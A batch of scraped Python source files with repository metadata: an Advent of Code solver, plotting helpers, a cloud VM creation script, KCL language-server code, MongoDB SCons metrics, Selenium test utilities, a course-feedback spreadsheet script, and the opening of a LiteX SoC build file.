{
"api_name": "wordcloud.generate_from_frequencies",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "PIL.Image.fromarray",
"line_number": 16,
"usage_type": "call"
},
{
"api_na... |
21533047473 | import sys, math
from collections import defaultdict
def countPerms(nxt):
prev = nxt.pop(0)
i = 0
print("r")
ans = 1
while True:
if i >= len(nxt):
return 1
if nxt[i] <= prev + 3:
ans += 1
i += 1
return ans * countPerms(nxt)
with open(sys.argv[1]) as fil:
adapters = sorted([0]+[int(i.strip()) for i in fil.readlines()])
adapters.append(max(adapters) + 3)
voltages = defaultdict(int)
print(adapters)
for i in range(len(adapters) - 1):
voltages[adapters[i+1]-adapters[i]] += 1
print(voltages)
print("Part 1:", voltages[3] * voltages[1])
print(countPerms(adapters.copy())) | micahjmartin/AdventOfCode2020 | 10/jolts.py | jolts.py | py | 658 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "collections.defaultdict",
"line_number": 23,
"usage_type": "call"
}
] |
8617391664 | from collections.abc import Iterable
from .vars import ColorPalette
import numpy as np
from powerlaw import plot_ccdf
def aaai_init_plot(plt, profile='1x2'):
rc = {'axes.titlesize': 18, 'axes.labelsize': 16, 'legend.fontsize': 16,
'font.size': 16, 'xtick.labelsize': 16, 'ytick.labelsize': 16}
plt.rcParams.update(rc)
if profile == '1x1':
fig, ax = plt.subplots(1, 1, figsize=(10, 4.2))
return ax
elif profile == '1x2':
fig, axes = plt.subplots(1, 2, figsize=(10, 3.3))
axes = axes.ravel()
return axes
elif profile == '1x3':
fig, axes = plt.subplots(1, 3, figsize=(10, 3.3))
axes = axes.ravel()
return axes
elif profile == '2x2':
fig, axes = plt.subplots(2, 2, figsize=(10, 6.6))
axes = axes.ravel()
return axes
def concise_fmt(x, pos):
if abs(x) // 1000000000 > 0:
return '{0:.0f}B'.format(x / 1000000000)
elif abs(x) // 1000000 > 0:
return '{0:.0f}M'.format(x / 1000000)
elif abs(x) // 1000 > 0:
return '{0:.0f}K'.format(x / 1000)
elif x == 10:
return '10'
elif x == 1:
return '1'
else:
return '{0:.0f}'.format(x)
def exponent_fmt(x, pos):
if x == 0:
return '0'
elif x == 1:
return '1'
elif x == 10:
return '10'
else:
return '$10^{{{0}}}$'.format(int(np.log10(x)))
def exponent_fmt2(x, pos):
if x == 0:
return '1'
elif x == 1:
return '10'
else:
return '$10^{{{0}}}$'.format(int(x))
def exponent_fmt3(x, pos):
if x < 0:
return '0'
elif x == 0:
return '1'
elif x == 1:
return '10'
else:
return '$10^{{{0}}}$'.format(int(x))
def hide_spines(axes):
if isinstance(axes, Iterable):
for ax in axes:
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
else:
axes.spines['right'].set_visible(False)
axes.spines['top'].set_visible(False)
def gini(arr):
count = arr.size
coefficient = 2 / count
indexes = np.arange(1, count + 1)
weighted_sum = (indexes * arr).sum()
total = arr.sum()
constant = (count + 1) / count
return coefficient * weighted_sum / total - constant
def lorenz(arr):
# this divides the prefix sum by the total sum
# this ensures all the values are between 0 and 1.0
scaled_prefix_sum = arr.cumsum() / arr.sum()
# this prepends the 0 value (because 0% of all people have 0% of all wealth)
return np.insert(scaled_prefix_sum, 0, 0)
def plot_dist_lorenz(axes, num_comment_list, color, ls, label, annotated=False):
plot_ccdf(num_comment_list, ax=axes[0], color=color, ls=ls, label=label)
sorted_comment_list = np.sort(np.array(num_comment_list))
lorenz_curve = lorenz(sorted_comment_list)
gini_coef = gini(sorted_comment_list)
print('>>> In {0} videos, Gini coefficient is {1:.4f}'.format(label, gini_coef))
axes[1].plot(np.linspace(0.0, 1.0, lorenz_curve.size), lorenz_curve, color=color, ls=ls, label=label)
if annotated:
pinned_idx = next(x for x, val in enumerate(lorenz_curve) if val > 0.25)
pinned_x = np.linspace(0.0, 1.0, lorenz_curve.size)[pinned_idx]
pinned_y = 0.25
axes[1].scatter([pinned_x], [pinned_y], c='r', s=30, marker='o', fc='r', ec='r', zorder=30)
axes[1].text(pinned_x, pinned_y, '({0:.2f}%, {1:.0f}%)'.format(100 - 100 * pinned_x, 100 - pinned_y * 100),
size=14, horizontalalignment='right', verticalalignment='bottom')
| avalanchesiqi/youtube-crosstalk | utils/plot_conf.py | plot_conf.py | py | 3,608 | python | en | code | 11 | github-code | 36 | [
{
"api_name": "numpy.log10",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "collections.abc.Iterable",
"line_number": 75,
"usage_type": "argument"
},
{
"api_name": "numpy.arange",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "numpy.insert",
... |
31986796192 | import json
import configparser
from tcecloud.common import credential
from tcecloud.common.profile.client_profile import ClientProfile
from tcecloud.common.profile.http_profile import HttpProfile
from tcecloud.common.exception.tce_cloud_sdk_exception import TceCloudSDKException
from tcecloud.cvm.v20170312 import cvm_client, models
class TceCvmCreate(object):
def __init__(self, SecretId, SecretKey):
self.SecretId = SecretId
self.SecretKey = SecretKey
def create_cvm(self, params):
try:
cred = credential.Credential(self.SecretId, self.SecretKey)
httpProfile = HttpProfile()
httpProfile.endpoint = "cvm.api3.tce.com"
clientProfile = ClientProfile()
clientProfile.httpProfile = httpProfile
client = cvm_client.CvmClient(cred, "chongqing", clientProfile)
req = models.RunInstancesRequest()
req.from_json_string(json.dumps(params))
resp = client.RunInstances(req)
print(resp.to_json_string())
except TceCloudSDKException as err:
print(err)
if __name__ == '__main__':
config = configparser.ConfigParser()
config.read("setting.ini", encoding="utf-8")
cvm = TceCvmCreate(config.get("defaults", "SecretId"), config.get("defaults", "SecretKey"))
params = {
"InstanceChargeType": "POSTPAID_BY_HOUR",
"Placement": {
"Zone": "cqaz1"
},
"InstanceType": "S3.MEDIUM4",
"ImageId": "img-cphll0yv",
"SystemDisk": {
"DiskType": "CLOUD_SSD",
"DiskSize": 50
},
"DataDisks": [
{
"DiskType": "CLOUD_SSD",
"DiskSize": 100,
"DeleteWithInstance": True
}
],
"VirtualPrivateCloud": {
"VpcId": "vpc-gynsaui3",
"SubnetId": "subnet-8r1n8f1s",
"AsVpcGateway": False,
},
"InstanceCount": 1,
"InstanceName": "test-liuzhx",
"LoginSettings": {
"Password": "Root123456789"
},
"SecurityGroupIds": ["sg-az6hnjl8"],
"EnhancedService": {
"SecurityService": {
"Enabled": True
},
"MonitorService": {
"Enabled": True
}
},
"HostName": "liuzhx",
"DryRun": False
}
cvm.create_cvm(params)
| zcsee/pythonPra | pra/create.py | create.py | py | 2,448 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tcecloud.common.credential.Credential",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "tcecloud.common.credential",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "tcecloud.common.profile.http_profile.HttpProfile",
"line_number": 18,
"u... |
1938506265 | from typing import List, cast, Optional
from pygls.lsp.types.basic_structures import Location
import kclvm.kcl.ast as ast
import kclvm.kcl.types.scope as scope
import kclvm.tools.langserver.common as common
from kclvm.api.object.object import KCLTypeKind, KCLModuleTypeObject
from kclvm.api.object.schema import KCLSchemaTypeObject, KCLSchemaDefTypeObject
def definition(
pos: ast.Position, code: str = None
) -> (Optional[ast.AST], Optional[scope.ScopeObject]):
prog: ast.Program
prog, leaf_node = common.pos_to_node(pos, code)
if not leaf_node:
# no name node at the position
return None, None
parent: ast.AST = leaf_node.parent
if isinstance(leaf_node, ast.Name):
if (
parent.type == "Identifier"
and parent.parent.type == "ConfigEntry"
and parent is parent.parent.key
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
schema_expr: ast.SchemaExpr = leaf_node.find_nearest_parent_by_type(
ast.SchemaExpr
)
if schema_expr:
schema_name: ast.Identifier = schema_expr.name
schema_scope_obj = find_declaration(
schema_name, schema_name.name_nodes[-1], prog_scope
)
top_attr = find_inner_name(
schema_scope_obj, identifier.name_nodes[0], prog_scope
)
result_obj = find_declaration_by_scope_obj(
identifier=identifier,
name_node=leaf_node,
top_name_obj=top_attr,
prog_scope=prog_scope,
)
return leaf_node, result_obj
if parent.type == "Identifier" and (
parent.parent.type != "ConfigEntry" or parent is parent.parent.value
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
declaration = find_declaration(identifier, leaf_node, prog_scope)
return leaf_node, declaration
return leaf_node, None
def go_to_def(pos: ast.Position, code: str = None) -> List[Location]:
prog: ast.Program
prog, leaf_node = common.pos_to_node(pos, code)
if not leaf_node:
# no name node at the position
return []
parent: ast.AST = leaf_node.parent
if isinstance(leaf_node, ast.Name):
if parent.type == "ImportStmt":
import_stmt: ast.ImportStmt = cast(ast.ImportStmt, parent)
if leaf_node in import_stmt.path_nodes:
index = import_stmt.path_nodes.index(leaf_node)
if index == len(import_stmt.path_nodes) - 1:
# this might be a module name, return the target module file path
loc = common.pkgpath_to_location(
root=prog.root, pkgpath=import_stmt.path
)
return [loc] if loc else []
return [common.node_to_location(leaf_node)]
if (
parent.type == "Identifier"
and parent.parent.type == "ConfigEntry"
and parent is parent.parent.key
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
schema_expr: ast.SchemaExpr = leaf_node.find_nearest_parent_by_type(
ast.SchemaExpr
)
if schema_expr:
schema_name: ast.Identifier = schema_expr.name
schema_scope_obj = find_declaration(
schema_name, schema_name.name_nodes[-1], prog_scope
)
top_attr = find_inner_name(
schema_scope_obj, identifier.name_nodes[0], prog_scope
)
result_obj = find_declaration_by_scope_obj(
identifier=identifier,
name_node=leaf_node,
top_name_obj=top_attr,
prog_scope=prog_scope,
)
loc = common.scope_obj_to_location(result_obj)
return [loc] if loc else []
if parent.type == "Identifier" and (
parent.parent.type != "ConfigEntry" or parent is parent.parent.value
):
identifier: ast.Identifier = cast(ast.Identifier, parent)
_, prog_scope = common.file_or_prog_to_scope(prog)
declaration = find_declaration(identifier, leaf_node, prog_scope)
loc = common.scope_obj_to_location(declaration)
return [loc] if loc else []
return [common.node_to_location(leaf_node)]
def find_declaration(
identifier: ast.Identifier, name_node: ast.Name, prog_scope: scope.ProgramScope
) -> Optional[scope.ScopeObject]:
if not identifier or not name_node or not prog_scope:
return None
top_name = identifier.name_nodes[0]
top_name_obj = find_declaration_obj_by_pos_and_name(
top_name.pos, top_name.value, prog_scope
)
return find_declaration_by_scope_obj(
identifier, name_node, top_name_obj, prog_scope
)
def find_declaration_by_scope_obj(
identifier: ast.Identifier,
name_node: ast.Name,
top_name_obj: scope.ScopeObject,
prog_scope: scope.ProgramScope,
) -> Optional[scope.ScopeObject]:
if not identifier or not name_node or not top_name_obj or not prog_scope:
return None
index = identifier.name_nodes.index(name_node)
i = 0
obj = top_name_obj
while i < index:
i = i + 1
obj = find_inner_name(obj, identifier.name_nodes[i], prog_scope)
if not obj:
return None
return obj
def find_declaration_obj_by_pos_and_name(
pos: ast.Position, name: str, prog_scope: scope.ProgramScope
) -> Optional[scope.ScopeObject]:
if not pos or not pos.is_valid() or not name or not prog_scope:
return None
inner_most = prog_scope.main_scope.inner_most(pos)
if not inner_most or not inner_most.elems:
return None
scope_obj = inner_most.elems.get(name)
if scope_obj is not None:
return scope_obj
# 1. search through the parent schema scope tree
parent_scope = inner_most.get_parent_schema_scope(prog_scope)
while parent_scope is not None:
scope_obj = parent_scope.elems.get(name)
if scope_obj is not None:
return scope_obj
parent_scope = parent_scope.get_parent_schema_scope(prog_scope)
# 2. search through the enclosing scope tree
while inner_most is not None:
scope_obj = inner_most.elems.get(name)
if scope_obj is not None:
return scope_obj
inner_most = inner_most.get_enclosing_scope()
return None
def find_inner_name(
out_name_obj: scope.ScopeObject,
inner_name: ast.Name,
prog_scope: scope.ProgramScope,
) -> Optional[scope.ScopeObject]:
if not out_name_obj or not inner_name or not prog_scope:
return None
if out_name_obj.type.type_kind() == KCLTypeKind.SchemaKind:
return find_attr_by_name(inner_name.value, out_name_obj.type, prog_scope)
if out_name_obj.type.type_kind() == KCLTypeKind.ModuleKind:
out_type = cast(KCLModuleTypeObject, out_name_obj.type)
if out_type.is_user_module:
pkg_scope = prog_scope.scope_map.get(out_type.pkgpath)
return pkg_scope.elems.get(inner_name.value) if pkg_scope else None
if out_name_obj.type.type_kind() == KCLTypeKind.SchemaDefKind:
out_type = cast(KCLSchemaDefTypeObject, out_name_obj.type)
return find_attr_by_name(inner_name.value, out_type.schema_type, prog_scope)
def find_attr_by_name(
attr_name: str, schema_type: KCLSchemaTypeObject, prog_scope: scope.ProgramScope
) -> Optional[scope.ScopeObject]:
while schema_type:
if attr_name in schema_type.attr_list:
# todo: support jump to schema index signature
pkg_scope = prog_scope.scope_map.get(schema_type.pkgpath)
schema_scope = pkg_scope.search_child_scope_by_name(schema_type.name)
return schema_scope.elems.get(attr_name) if schema_scope else None
schema_type = schema_type.base
return None
| kcl-lang/kcl-py | kclvm/tools/langserver/go_to_def.py | go_to_def.py | py | 8,329 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "kclvm.kcl.ast.Position",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "kclvm.kcl.ast",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "kclvm.kcl.ast.Program",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "... |
36840454719 | """SCons metrics."""
import re
import os
from typing import Optional, NamedTuple, List, Pattern, AnyStr
from buildscripts.util.cedar_report import CedarMetric, CedarTestReport
SCONS_METRICS_REGEX = re.compile(r"scons: done building targets\.((\n.*)*)", re.MULTILINE)
MEMORY_BEFORE_READING_SCONSCRIPT_FILES_REGEX = re.compile(
r"Memory before reading SConscript files:(.+)")
MEMORY_AFTER_READING_SCONSCRIPT_FILES_REGEX = re.compile(
r"Memory after reading SConscript files:(.+)")
MEMORY_BEFORE_BUILDING_TARGETS_REGEX = re.compile(r"Memory before building targets:(.+)")
MEMORY_AFTER_BUILDING_TARGETS_REGEX = re.compile(r"Memory after building targets:(.+)")
OBJECT_COUNTS_REGEX = re.compile(r"Object counts:(\n.*)+Class\n(^[^:]+$)", re.MULTILINE)
TOTAL_BUILD_TIME_REGEX = re.compile(r"Total build time:(.+)seconds")
TOTAL_SCONSCRIPT_FILE_EXECUTION_TIME_REGEX = re.compile(
r"Total SConscript file execution time:(.+)seconds")
TOTAL_SCONS_EXECUTION_TIME_REGEX = re.compile(r"Total SCons execution time:(.+)seconds")
TOTAL_COMMAND_EXECUTION_TIME_REGEX = re.compile(r"Total command execution time:(.+)seconds")
CACHE_HIT_RATIO_REGEX = re.compile(r"(?s)\.*hit rate: (\d+\.\d+)%(?!.*hit rate: (\d+\.\d+)%)")
DEFAULT_CEDAR_METRIC_TYPE = "THROUGHPUT"
class ObjectCountsMetric(NamedTuple):
"""Class representing Object counts metric."""
class_: Optional[str]
pre_read: Optional[int]
post_read: Optional[int]
pre_build: Optional[int]
post_build: Optional[int]
def as_cedar_report(self) -> CedarTestReport:
"""Return cedar report representation."""
metrics = [
CedarMetric(
name="pre-read object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.pre_read,
),
CedarMetric(
name="post-read object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.post_read,
),
CedarMetric(
name="pre-build object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.pre_build,
),
CedarMetric(
name="post-build object count",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.post_build,
),
]
return CedarTestReport(
test_name=f"{self.class_} class",
thread_level=1,
metrics=metrics,
)
class SconsMetrics:
"""Class representing SCons metrics."""
memory_before_reading_sconscript_files: Optional[int] = None
memory_after_reading_sconscript_files: Optional[int] = None
memory_before_building_targets: Optional[int] = None
memory_after_building_targets: Optional[int] = None
object_counts: List[ObjectCountsMetric] = None
total_build_time: Optional[float] = None
total_sconscript_file_execution_time: Optional[float] = None
total_scons_execution_time: Optional[float] = None
total_command_execution_time: Optional[float] = None
final_cache_hit_ratio: Optional[float] = None
def __init__(self, stdout_log_file, cache_debug_log_file):
"""Init."""
with open(stdout_log_file, "r") as fh:
res = SCONS_METRICS_REGEX.search(fh.read())
self.raw_report = res.group(1).strip() if res else ""
if self.raw_report:
self.memory_before_reading_sconscript_files = self._parse_int(
MEMORY_BEFORE_READING_SCONSCRIPT_FILES_REGEX, self.raw_report)
self.memory_after_reading_sconscript_files = self._parse_int(
MEMORY_AFTER_READING_SCONSCRIPT_FILES_REGEX, self.raw_report)
self.memory_before_building_targets = self._parse_int(
MEMORY_BEFORE_BUILDING_TARGETS_REGEX, self.raw_report)
self.memory_after_building_targets = self._parse_int(
MEMORY_AFTER_BUILDING_TARGETS_REGEX, self.raw_report)
self.object_counts = self._parse_object_counts(OBJECT_COUNTS_REGEX, self.raw_report)
self.total_build_time = self._parse_float(TOTAL_BUILD_TIME_REGEX, self.raw_report)
self.total_sconscript_file_execution_time = self._parse_float(
TOTAL_SCONSCRIPT_FILE_EXECUTION_TIME_REGEX, self.raw_report)
self.total_scons_execution_time = self._parse_float(TOTAL_SCONS_EXECUTION_TIME_REGEX,
self.raw_report)
self.total_command_execution_time = self._parse_float(
TOTAL_COMMAND_EXECUTION_TIME_REGEX, self.raw_report)
if os.path.exists(cache_debug_log_file):
try:
with open(cache_debug_log_file, "r") as fh:
self.final_cache_hit_ratio = self._parse_float(CACHE_HIT_RATIO_REGEX, fh.read())
except Exception: # pylint: disable=broad-except
self.final_cache_hit_ratio = 0.0
else:
self.final_cache_hit_ratio = 0.0
def make_cedar_report(self) -> List[dict]:
"""Format the data to look like a cedar report json."""
cedar_report = []
if not self.raw_report:
return cedar_report
if self.memory_before_reading_sconscript_files:
cedar_report.append(
CedarTestReport(
test_name="Memory before reading SConscript files",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_before_reading_sconscript_files,
)
],
).as_dict())
if self.memory_after_reading_sconscript_files:
cedar_report.append(
CedarTestReport(
test_name="Memory after reading SConscript files",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_after_reading_sconscript_files,
)
],
).as_dict())
if self.memory_before_building_targets:
cedar_report.append(
CedarTestReport(
test_name="Memory before building targets",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_before_building_targets,
)
],
).as_dict())
if self.memory_after_building_targets:
cedar_report.append(
CedarTestReport(
test_name="Memory after building targets",
thread_level=1,
metrics=[
CedarMetric(
name="bytes",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.memory_after_building_targets,
)
],
).as_dict())
if self.total_build_time:
cedar_report.append(
CedarTestReport(
test_name="Total build time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_build_time,
)
],
).as_dict())
if self.total_sconscript_file_execution_time:
cedar_report.append(
CedarTestReport(
test_name="Total SConscript file execution time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_sconscript_file_execution_time,
)
],
).as_dict())
if self.total_scons_execution_time:
cedar_report.append(
CedarTestReport(
test_name="Total SCons execution time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_scons_execution_time,
)
],
).as_dict())
if self.total_command_execution_time:
cedar_report.append(
CedarTestReport(
test_name="Total command execution time",
thread_level=1,
metrics=[
CedarMetric(
name="seconds",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.total_command_execution_time,
)
],
).as_dict())
if self.object_counts:
for obj_counts in self.object_counts:
cedar_report.append(obj_counts.as_cedar_report().as_dict())
if self.final_cache_hit_ratio:
cedar_report.append(
CedarTestReport(
test_name="Final cache hit ratio",
thread_level=1,
metrics=[
CedarMetric(
name="percent",
type=DEFAULT_CEDAR_METRIC_TYPE,
value=self.final_cache_hit_ratio,
),
],
).as_dict())
return cedar_report
@classmethod
def _parse_int(cls, regex: Pattern[AnyStr], raw_str: str) -> Optional[int]:
"""Parse int value."""
res = regex.search(raw_str)
if res:
return int(res.group(1).strip())
return None
@classmethod
def _parse_float(cls, regex: Pattern[AnyStr], raw_str: str) -> Optional[float]:
"""Parse float value."""
res = regex.search(raw_str)
if res:
return float(res.group(1).strip())
return None
@classmethod
def _parse_object_counts(cls, regex: Pattern[AnyStr], raw_str: str) -> List[ObjectCountsMetric]:
"""Parse object counts metrics."""
object_counts = []
res = regex.search(raw_str)
if res:
object_counts_raw = res.group(2)
for line in object_counts_raw.splitlines():
line_split = line.split()
if len(line_split) == 5:
object_counts.append(
ObjectCountsMetric(
class_=line_split[4],
pre_read=int(line_split[0]),
post_read=int(line_split[1]),
pre_build=int(line_split[2]),
post_build=int(line_split[3]),
))
return object_counts
| mongodb/mongo | buildscripts/scons_metrics/metrics.py | metrics.py | py | 11,535 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "re.compile",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "re.MULTILINE",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "re.compile",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number":... |
427635491 | # Base Mechanism
import selenium
import requests as req
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait as WDW
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options as ChromeOptions
from selenium.webdriver.edge.options import Options as EdgeOptions
from selenium.webdriver.common.action_chains import ActionChains
from src.locators.locators_index import HomePageLocators
# Databases
from src.db import db_gets_it as db_get
# Additionals
import string
import random
from time import sleep
# testing methods
import pytest
from selenium.common import exceptions as sel_except
url = 'https://qa.trado.co.il/'
def setup_driver(modal=False):
driver = ""
url = 'https://qa.trado.co.il/'
if conf.get_browser == 'chrome':
options = ChromeOptions()
options.add_argument("--disable-extensions")
# options.add_argument("--headless")
driver = webdriver.Chrome(options=options, executable_path="src/webdrivers/chromedriver.exe")
elif conf.get_browser == 'edge':
options = EdgeOptions()
options.add_argument("--disable-extensions")
# options.add_argument("--headless")
driver = webdriver.Edge(options=options, executable_path="src/webdrivers/msedgedriver.exe")
else:
options = ChromeOptions()
options.add_argument("--disable-extensions")
# options.add_argument("--headless")
driver = webdriver.Chrome(options=options, executable_path="src/webdrivers/chromedriver.exe")
driver.maximize_window()
driver.get(url)
if modal:
close_popup(driver)
else:
remove_annoying_popup(driver)
return driver
def remove_annoying_popup(driver):
WDW(driver, 5).until(EC.visibility_of_element_located(HomePageLocators.homeloc['popup_modal']))
driver.execute_script("""
var l = document.getElementsByClassName("modal_modalWrapper")[0];
l.parentNode.removeChild(l);
""")
def close_popup(driver):
try:
WDW(driver, 5).until(EC.visibility_of_element_located(HomePageLocators.homeloc['close_pop_up'])).click()
except sel_except.TimeoutException:
return
def click_somewhere_in_the_page(driver):
driver.find_element(By.XPATH, '//html').click()
def rand_string(group=string.digits, n=10):
"""
this function is taking a group of letters and then takes a number.
it returns a string with random chars from the group in the length of the number we provided
:param group:
:param n:
:return:
"""
return ''.join(random.choice(group) for i in range(n))
def filter_numbers(srt):
"""
string in, numbers out
filter text out, save only digits
:param srt:
:return:
"""
flt = "".join([flt for flt in srt if flt.isdigit()])
return int(flt)
| VSciFlight/IITC_trado_final_project | src/utils.py | utils.py | py | 2,925 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 38,
"usage_type": "name"
},
{... |
72623883625 | from django.contrib import admin
from .models import Category, Article, Like, Favorite, Comment
from import_export import resources
from import_export.admin import ImportExportModelAdmin
from django.utils.translation import gettext_lazy as _
class CategoryResource(resources.ModelResource):
class Meta:
model = Category
@admin.register(Category)
class CategoryAdmin(ImportExportModelAdmin, admin.ModelAdmin):
fieldsets = (
(_('Information'), {'fields': ('title', 'slug')}),
(_('Content'), {'fields': ('image', 'content')}),
)
list_display = ('title', 'slug')
list_display_links = ('title',)
list_editable = ('slug',)
prepopulated_fields = {"slug": ("title",)}
resource_class = CategoryResource
class Meta:
model = Category
@admin.register(Article)
class ArticleAdmin(admin.ModelAdmin):
fieldsets = (
(_('Information'), {'fields': ('user', 'title', 'slug', 'category', 'article_id')}),
(_('Content'), {'fields': ('image', 'content')}),
(_('Likes'), {'fields': ('liked',)}),
(_('Status'), {'fields': ('status',)})
)
list_display = ('title', 'slug', 'category', 'created_date', 'status', 'user')
list_display_links = ('title',)
list_editable = ('category', 'status')
list_filter = ('category', 'status')
search_fields = ('title', 'category', 'user')
class Meta:
model = Article
admin.site.register(Comment)
admin.site.register(Like)
admin.site.register(Favorite)
| FurkanKockesen/avukatimv2 | backEnd/blog/admin.py | admin.py | py | 1,510 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "import_export.resources.ModelResource",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "import_export.resources",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "models.Category",
"line_number": 10,
"usage_type": "name"
},
{
"... |
5146118763 | import os
import openpyxl
import shutil
import pandas as pd
import regex as re
dict1 = {}
dict2 = {}
def student():
df = pd.read_csv('studentinfo.csv')
for i in range(len(df)):
rolln = df.loc[i, "Roll No."]
email = df.loc[i, "email"]
aemail = df.loc[i, "aemail"]
contact = df.loc[i, "contact"]
name = df.loc[i, "Name"]
dict1[rolln] = {'subjects': {}, 'name': name,
'email': email, 'aemail': aemail, 'contact': contact}
return
def course_master():
df = pd.read_csv('course_master_dont_open_in_excel.csv')
for i in range(len(df)):
subno = df.loc[i, "subno"]
ltp = df.loc[i, "ltp"].split('-')
if subno in dict2:
continue
dict2[subno] = []
for j, s in enumerate(ltp):
if s != '0':
dict2[subno].append(j+1)
def course_registered():
df = pd.read_csv('course_registered_by_all_students.csv')
for i in range(len(df)):
rolln = df.loc[i, "rollno"]
subno = df.loc[i, "subno"]
register_sem = df.loc[i, "register_sem"]
schedule_sem = df.loc[i, "schedule_sem"]
if rolln not in dict1:
dict1[rolln] = {'subjects': {}, 'name': 'NA_IN_STUDENT_INFO',
'email': 'NA_IN_STUDENT_INFO', 'aemail': 'NA_IN_STUDENT_INFO', 'contact': 'NA_IN_STUDENT_INFO'}
dict1[rolln]['subjects'][subno] = {
'ltp': [], 'register_sem': register_sem, 'schedule_sem': schedule_sem}
def feedback():
df = pd.read_csv('course_feedback_submitted_by_students.csv')
for i in range(len(df)):
rolln = df.loc[i, "rollno"]
subno = df.loc[i, "subno"]
feedback_type = df.loc[i, "feedback_type"]
if rolln not in dict1:
continue
if len(dict2[subno]) == 0:
continue
if feedback_type not in dict1[rolln]['subjects'][subno]['ltp']:
dict1[rolln]['subjects'][subno]['ltp'].append(feedback_type)
def correlate(output_file):
if not os.path.exists(output_file):
wb = openpyxl.Workbook()
else:
wb = openpyxl.load_workbook(output_file)
ws = wb['Sheet']
ws.append(["rollno", "register_sem", "schedule_sem",
"subno", "Name", "email", "aemail", "contact"])
for rolln in dict1:
for subject in dict1[rolln]['subjects']:
subno = str(subject)
dict1[rolln]['subjects'][subno]['ltp'].sort()
if dict1[rolln]['subjects'][subno]['ltp'] == dict2[subno]:
continue
register_sem = dict1[rolln]['subjects'][subno]['register_sem']
schedule_sem = dict1[rolln]['subjects'][subno]['schedule_sem']
name = dict1[rolln]['name']
email = dict1[rolln]['email']
aemail = dict1[rolln]['aemail']
contact = dict1[rolln]['contact']
ws.append([rolln, register_sem, schedule_sem,
subno, name, email, aemail, contact])
wb.save(output_file)
def feedback_not_submitted():
ltp_mapping_feedback_type = {1: 'lecture', 2: 'tutorial', 3: 'practical'}
output_file_name = "course_feedback_remaining.xlsx"
student()
course_master()
course_registered()
feedback()
correlate(output_file_name)
feedback_not_submitted()
| apoodwivedi/1901CB10_2021 | tut07/tempCodeRunnerFile.py | tempCodeRunnerFile.py | py | 3,427 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
... |
9438904216 | import os
import argparse
import sys
import subprocess
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
import litex_platform_n64
from litex.build.io import SDRTristate, SDRInput, DDROutput
from litex.soc.cores.clock import *
from litex.soc.cores.spi_flash import SpiFlash, SpiFlashSingle
from litex.soc.cores.gpio import GPIOIn, GPIOOut
from litex.soc.integration.soc_core import *
from litex.soc.integration.builder import *
from litex.soc.integration.common import *
from litex.soc.interconnect import wishbone
from litex.build.generic_platform import *
from litedram.modules import IS42S16320
from litedram.phy import GENSDRPHY
from litex_clock import iCE40PLL_90deg
# Simulation
from litex.build.sim.config import SimConfig
from litedram.phy.model import SDRAMPHYModel
from litex.soc.cores import uart
# IOs ----------------------------------------------------------------------------------------------
_gpios = [
("gpio", 0, Pins("j4:0"), IOStandard("LVCMOS33")),
("gpio", 1, Pins("j4:1"), IOStandard("LVCMOS33")),
]
# CRG ----------------------------------------------------------------------------------------------
class _CRG(Module):
def __init__(self, platform, sys_clk_freq):
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_sys_ps = ClockDomain()
self.clock_domains.cd_por = ClockDomain()
# # #
# Clk / Rst
clk25 = platform.request("clk25")
platform.add_period_constraint(clk25, 1e9/25e6)
#if sys_clk_freq == 25e6:
